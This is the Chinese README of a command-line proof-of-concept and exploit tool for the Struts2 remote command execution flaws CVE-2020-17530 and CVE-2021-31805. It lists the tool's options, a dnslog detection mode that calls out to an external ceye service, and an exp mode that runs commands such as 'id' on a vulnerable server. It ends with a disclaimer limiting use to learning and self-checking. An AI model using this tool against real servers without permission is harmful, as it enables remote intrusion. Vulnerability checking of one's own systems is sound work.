Struts2 远程命令执行漏洞(CVE-2020-17530&CVE-2021-31805)POC&EXP
- 参数介绍
-u 目标url
-m [dnslog|exp] //默认有回显界面字符检查
-n [s2-062] //默认s2-061
-s [windows] //默认linux
-p 漏洞参数
- 有回显检测
Struts2RCE -u http://127.0.0.1:8080 //默认s2-061检测
- 无回显检测
请自行注册ceye,并配置好ceye.ini
Struts2RCE -u http://127.0.0.1:8080 -m dnslog -n s2-062 //s2-062 dnslog检测,检测速度跟网络和ceye服务器有关,不同url需要清除dnslog记录,否则会造成误判。
- EXP
存在漏洞情况下,可直接输入漏洞参数进行验证
Struts2RCE -u http://127.0.0.1:8080 -m exp -p id //s2-061漏洞,参数为id的验证,输入q退出
此工具仅用于学习、研究和自查。 不应用于非法目的,请遵守相关法律法规。 使用本工具产生的任何风险与本人无关!